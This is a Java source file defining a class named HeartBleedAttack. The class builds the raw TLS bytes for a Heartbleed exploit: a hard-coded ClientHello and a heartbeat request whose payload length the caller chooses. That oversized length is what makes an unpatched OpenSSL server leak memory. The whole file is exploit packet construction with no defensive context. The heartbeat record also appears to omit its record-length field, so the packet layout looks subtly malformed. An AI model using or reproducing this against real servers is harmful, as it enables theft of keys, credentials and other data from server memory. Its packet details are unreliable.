public class HeartBleedAttack {


    byte[] hbPacket;
    byte[] helloPacket;

    public HeartBleedAttack(byte tlsVersion, byte[]payloadLength){

        //PayLoad should be 2 bytes
        assert payloadLength.length == 2;

        hbPacket = new byte[]{
            //TLS Header
            0x18, //Type. heartbeat
            0x03, tlsVersion, //TLS Version
            //Payload
            0x01, //Type request
             payloadLength[0], payloadLength[1]
        };

        helloPacket = new byte[]{
                0x16, 0x03, tlsVersion , 0x00, (byte)0xdc, 0x01, 0x00, 0x00, (byte) 0xd8, 0x03, 0x02, 0x53,
                0x43, 0x5b, (byte) 0x90, (byte) 0x9d, (byte)0x9b, 0x72, 0x0b, (byte) 0xbc,  0x0c, (byte) 0xbc, 0x2b, (byte) 0x92, (byte) 0xa8, 0x48, (byte) 0x97, (byte) 0xcf,
                (byte) 0xbd, 0x39, 0x04, (byte) 0xcc, 0x16, 0x0a, (byte) 0x85, 0x03,  (byte) 0x90, (byte) 0x9f, 0x77, 0x04, 0x33, (byte) 0xd4, (byte) 0xde, 0x00,
                0x00, 0x66, (byte) 0xc0, 0x14, (byte) 0xc0, 0x0a, (byte) 0xc0, 0x22,  (byte) 0xc0, 0x21, 0x00, 0x39, 0x00, 0x38, 0x00, (byte) 0x88,
                0x00, (byte) 0x87, (byte) 0xc0, 0x0f, (byte) 0xc0, 0x05, 0x00, 0x35,  0x00, (byte) 0x84, (byte) 0xc0, 0x12, (byte) 0xc0, 0x08, (byte) 0xc0, 0x1c,
                (byte) 0xc0, 0x1b, 0x00, 0x16, 0x00, 0x13, (byte) 0xc0, 0x0d,  (byte) 0xc0, 0x03, 0x00, 0x0a, (byte) 0xc0, 0x13, (byte) 0xc0, 0x09,
                (byte) 0xc0, 0x1f, (byte) 0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32,  0x00, (byte) 0x9a, 0x00, (byte) 0x99, 0x00, 0x45, 0x00, 0x44,
                (byte) 0xc0, 0x0e, (byte) 0xc0, 0x04, 0x00, 0x2f, 0x00, (byte) 0x96,  0x00, 0x41, (byte) 0xc0, 0x11, (byte) 0xc0, 0x07, (byte) 0xc0, 0x0c,
                (byte) 0xc0, 0x02, 0x00, 0x05, 0x00, 0x04, 0x00, 0x15,  0x00, 0x12, 0x00, 0x09, 0x00, 0x14, 0x00, 0x11,
                0x00, 0x08, 0x00, 0x06, 0x00, 0x03, 0x00, (byte) 0xff,  0x01, 0x00, 0x00, 0x49, 0x00, 0x0b, 0x00, 0x04,
                0x03, 0x00, 0x01, 0x02, 0x00, 0x0a, 0x00, 0x34,  0x00, 0x32, 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x19,
                0x00, 0x0b, 0x00, 0x0c, 0x00, 0x18, 0x00, 0x09,  0x00, 0x0a, 0x00, 0x16, 0x00, 0x17, 0x00, 0x08,
                0x00, 0x06, 0x00, 0x07, 0x00, 0x14, 0x00, 0x15,  0x00, 0x04, 0x00, 0x05, 0x00, 0x12, 0x00, 0x13,
                0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x0f,  0x00, 0x10, 0x00, 0x11, 0x00, 0x23, 0x00, 0x00,
                0x00, 0x0f, 0x00, 0x01, 0x01
        };




    }

    public byte[] getHeartBeatBytes(){
        return hbPacket;
    }

    public byte[] getHelloPacket(){
        return helloPacket;
    }
}
